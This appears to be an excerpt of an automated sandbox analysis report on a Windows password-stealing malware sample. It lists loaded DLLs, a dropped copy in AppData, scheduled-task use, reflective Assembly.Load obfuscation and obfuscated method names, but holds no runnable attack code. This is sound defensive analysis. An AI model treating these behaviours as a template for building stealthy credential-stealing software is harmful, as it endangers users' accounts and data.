            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wGsy.pdb source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: Binary string: wGsy.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr

Data Obfuscation

Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, MainForm.cs .Net Code: InitializeComponent
Source: ZRuVeAoBoxootS.exe.0.dr, MainForm.cs .Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs .Net Code: MP5mMDDXXf System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.cs .Net Code: MP5mMDDXXf System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Static PE information: 0xFB34CD15 [Sun Jul 22 09:59:49 2103 UTC]
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 16_2_0041A8DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Code function: 0_2_071E3DC3 push esi; ret 0_2_071E3DC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Code function: 0_2_071E04E5 push edi; ret 0_2_071E04E6
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 10_2_04F0EB08 pushfd ; iretd 10_2_04F0EB09
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 10_2_04F31760 pushfd ; iretd 10_2_04F3176E
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 10_2_04F3DDB0 push eax; mov dword ptr [esp], ecx 10_2_04F3DDC4
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 10_2_07153DC3 push esi; ret 10_2_07153DC7
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 10_2_071504E5 push edi; ret 10_2_071504E6
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_004000D8 push es; iretd 16_2_004000D9
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040008C push es; iretd 16_2_0040008D
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_004542E6 push ecx; ret 16_2_004542F9
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0045B4FD push esi; ret 16_2_0045B506
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_00432BD6 push ecx; ret 16_2_00432BE9
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_00454C08 push eax; ret 16_2_00454C26
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Static PE information: section name: .text entropy: 7.889865290464799
Source: ZRuVeAoBoxootS.exe.0.dr Static PE information: section name: .text entropy: 7.889865290464799
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, kD0JNdgNBriBGn5egS.cs High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, kD0JNdgNBriBGn5egS.cs High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, EfxCjuFBDrNuN7uJX7.cs High entropy of concatenated method names: 'TBU1CCAT02', 'PZq1uGawfP', 'FwT1IHX7OG', 'hvP191NwF2', 'GjB1ZGBMJg', 'mJK1gwrPKV', 'Wyr1XuL1bs', 'I0u1ViqFM7', 'JQW1KsyRXi', 'Xft1bX8RmG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, lkuJijGJA6QitIMHQK.cs High entropy of concatenated method names: 'TnIqFhnNMi', 'AFiq38Zdfn', 'RA2qvnpdVo', 'SZwqJtjQef', 'z8kqLCUIU9', 'UKXq0HEgNS', 'rjCqRHpLNv', 'rnvqejk0bn', 'BDCqpEsfRS', 'xoDqlWmh7i'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, I7aJyVNsghslwdtrVG.cs High entropy of concatenated method names: 'IEFMtjqse', 'iTODn32aG', 'rcnj0FY1q', 'SB2y6rQOO', 'iqb3rN5j0', 'yYIwITMcP', 'jNcv1o7JKRwElev7Kk', 'krJbuYrFu6BSWjtW37', 'N5G4HB3wd', 'dkNiGBACT'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, HyKoFt1awVqhaZRMxC.cs High entropy of concatenated method names: 'Dispose', 'NGkYK4ybIn', 'WTjNJxJYyf', 'qoFxxJtpup', 'Va9YbxTZu9', 'cYVYzX61fM', 'ProcessDialogKey', 'Pn4N2mOjkR', 'OyiNYXYMj6', 'DGiNNowNl3'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, OlwxSt3SLygh9HEPRe.cs High entropy of concatenated method names: 'EdLTD4rYgy', 'LPoTjF820l', 'EBhTFYxLrv', 'XJfT3xVNHq', 'lVlTaZEUv3', 'eSOTrSYGhV', 'Tw9TcLpxgq', 'R3gT4UR64U', 'nbRT5RNW9L', 'VegTi66q92'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, MnuU6QzJsDF6PVTCy9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrn5q1Lj2H', 'Jec5awT7HL', 'OnD5rQAXGd', 'edK5c5BBj7', 'ybM54Wf8jS', 'owE55TtWQN', 'dyh5iKL6Ho'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs High entropy of concatenated method names: 'PL2hoYLtmC', 'mw1hQvEoiq', 'xXvh1ko1hd', 'NshhTmKtnb', 'ehMhsXWEeh', 'RQRhST9LYa', 'dLNh8sTY8V', 'IZvhE219Fb', 'JWFhBDNVj3', 'pp9hAUmyMf'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, rmOjkRKpyiXYMj6yGi.cs High entropy of concatenated method names: 'tVZ4vKASYd', 'bYF4JJ66I9', 'Ghd4OGLcVq', 'fiW4LMhf4c', 'G5T4CDgGLe', 'kQF40hpGlr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, o9xTZuV9hYVX61fMGn.cs High entropy of concatenated method names: 'Piy4Q0IsUi', 'iIy41irODR', 'aJL4TQiBkX', 'nic4soAnlJ', 'NTj4SkinHl', 'Rgt48V2n96', 'eM24E5mahX', 'gnt4BAWuTO', 'ljQ4AqLMHN', 'FtL4nNJB02'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, T0le2hY2rtIJPNaxna6.cs High entropy of concatenated method names: 'F5J5kWV3d8', 'SIv5fRXJPT', 'jrP5MFOd5N', 'gus5DBBqhN', 'l0Q57u1KbD', 'mk25j7S3DS', 'T4l5ywNUl9', 'TiA5FV6RMb', 'kxv53PZsZX', 'BV15wJuAl8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, XfmVEBR51QqlUKyLtF.cs High entropy of concatenated method names: 'oC68Qi8gG5', 'zHp8Tm0XhP', 'LUA8SZbiI6', 'XrrSbvaOqg', 'Pr8Sz4FAUw', 'bDB82JNMuk', 'gGL8Y3QdOa', 'r8O8NjFJbc', 'WQH8hx3qxy', 'H1h8mNKJQx'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, h2aH3Zw7YiXsYvfS8o.cs High entropy of concatenated method names: 'oiSs71gP9h', 'js9syAupJF', 'LDWTO4p3GE', 'ILDTLU4jFQ', 'Ua3T0oCYeZ', 'BYUTWk7ZOP', 'MODTRY6KkR', 'JFNTeeoSIl', 'CxITU8Yl3m', 'fSWTpgKtaw'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, AYNBkYmfaoQBEXCiUE.cs High entropy of concatenated method names: 'IVwY8fxCju', 'lDrYENuN7u', 'vSLYAygh9H', 'kPRYneT2aH', 'GfSYa8odvi', 'Cb6YrSAUsK', 'sHfcNX06N4fGkTH61i', 'GhFA1oGUwWO5rTCfHS', 'pNiYY9GDlG', 'lHUYhclGxS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, GQRECeC3l81YAYQ30a.csHigh entropy of concatenated method names: 'SNLapDJay7', 'jZga6SH1My', 'dAgaCmd8FQ', 'XIfauSDTEH', 'iAmaJIU9UO', 'UHYaOtayXJ', 'DtwaL6KjK1', 'T2ia0vGXvf', 'ehGaWBr6Cf', 'DXoaR90KsS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, cPlswiYh05wBgPDnxUk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YtUiCUwKlJ', 'FiaiuDBA7Q', 'A8hiI17tUZ', 'gv3i9C93hv', 'OpRiZ1R7Wi', 'XEQigpwuKQ', 'jFiiXTFiVn'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, wvijb6vSAUsKHvHnSp.csHigh entropy of concatenated method names: 'KdFSojbX83', 'FlhS12VQxR', 'x5pSsfwmaG', 'CLgS8HyUbT', 'GyISEicECP', 'NYHsZOEqTa', 'dehsgbjhOy', 'qCAsXmqh5A', 'KJRsV83yh0', 'DmfsKuxOTp'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, uaPTeHgKCLb8SQmwLp.csHigh entropy of concatenated method names: 't85cVyNwsT', 'WP1cbyNmtS', 'z1342myyaX', 'TFZ4YkW8uc', 'FXwclfmTtT', 'Y68c6TElhn', 'Pp0cGBVXUl', 'f5ncCydqow', 'P0bcuwyrlA', 'hj6cIxXmJI'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, ewNl33b2siSM29DQHA.csHigh entropy of concatenated method names: 'x7H5YqtmE6', 'dX05hACy36', 'HcG5mTDJlq', 'tUs5QPNJsA', 'nel51cN6RM', 'Ikb5sc4kDe', 'OPb5SMrLkn', 'ogU4X6ZYmw', 'HEe4VLScG9', 'gjb4KEG767'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, gbF8glUNGRlbMNV65a.csHigh entropy of concatenated method names: 'Wf88k8R4Vr', 'vTs8fyRjZk', 'u1u8Muivvk', 'Gji8DNLQND', 'IfH8786dSY', 'biP8jcZ3ra', 'YwA8y75RXu', 'o8v8F21eln', 'DTP83usHPV', 'mqN8wcIjvw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, EfxCjuFBDrNuN7uJX7.csHigh entropy of concatenated method names: 'TBU1CCAT02', 'PZq1uGawfP', 'FwT1IHX7OG', 'hvP191NwF2', 'GjB1ZGBMJg', 'mJK1gwrPKV', 'Wyr1XuL1bs', 'I0u1ViqFM7', 'JQW1KsyRXi', 'Xft1bX8RmG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, lkuJijGJA6QitIMHQK.csHigh entropy of concatenated method names: 'TnIqFhnNMi', 'AFiq38Zdfn', 'RA2qvnpdVo', 'SZwqJtjQef', 'z8kqLCUIU9', 'UKXq0HEgNS', 'rjCqRHpLNv', 'rnvqejk0bn', 'BDCqpEsfRS', 'xoDqlWmh7i'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, I7aJyVNsghslwdtrVG.csHigh entropy of concatenated method names: 'IEFMtjqse', 'iTODn32aG', 'rcnj0FY1q', 'SB2y6rQOO', 'iqb3rN5j0', 'yYIwITMcP', 'jNcv1o7JKRwElev7Kk', 'krJbuYrFu6BSWjtW37', 'N5G4HB3wd', 'dkNiGBACT'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, HyKoFt1awVqhaZRMxC.csHigh entropy of concatenated method names: 'Dispose', 'NGkYK4ybIn', 'WTjNJxJYyf', 'qoFxxJtpup', 'Va9YbxTZu9', 'cYVYzX61fM', 'ProcessDialogKey', 'Pn4N2mOjkR', 'OyiNYXYMj6', 'DGiNNowNl3'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, OlwxSt3SLygh9HEPRe.csHigh entropy of concatenated method names: 'EdLTD4rYgy', 'LPoTjF820l', 'EBhTFYxLrv', 'XJfT3xVNHq', 'lVlTaZEUv3', 'eSOTrSYGhV', 'Tw9TcLpxgq', 'R3gT4UR64U', 'nbRT5RNW9L', 'VegTi66q92'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, MnuU6QzJsDF6PVTCy9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrn5q1Lj2H', 'Jec5awT7HL', 'OnD5rQAXGd', 'edK5c5BBj7', 'ybM54Wf8jS', 'owE55TtWQN', 'dyh5iKL6Ho'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.csHigh entropy of concatenated method names: 'PL2hoYLtmC', 'mw1hQvEoiq', 'xXvh1ko1hd', 'NshhTmKtnb', 'ehMhsXWEeh', 'RQRhST9LYa', 'dLNh8sTY8V', 'IZvhE219Fb', 'JWFhBDNVj3', 'pp9hAUmyMf'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, rmOjkRKpyiXYMj6yGi.csHigh entropy of concatenated method names: 'tVZ4vKASYd', 'bYF4JJ66I9', 'Ghd4OGLcVq', 'fiW4LMhf4c', 'G5T4CDgGLe', 'kQF40hpGlr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, o9xTZuV9hYVX61fMGn.csHigh entropy of concatenated method names: 'Piy4Q0IsUi', 'iIy41irODR', 'aJL4TQiBkX', 'nic4soAnlJ', 'NTj4SkinHl', 'Rgt48V2n96', 'eM24E5mahX', 'gnt4BAWuTO', 'ljQ4AqLMHN', 'FtL4nNJB02'
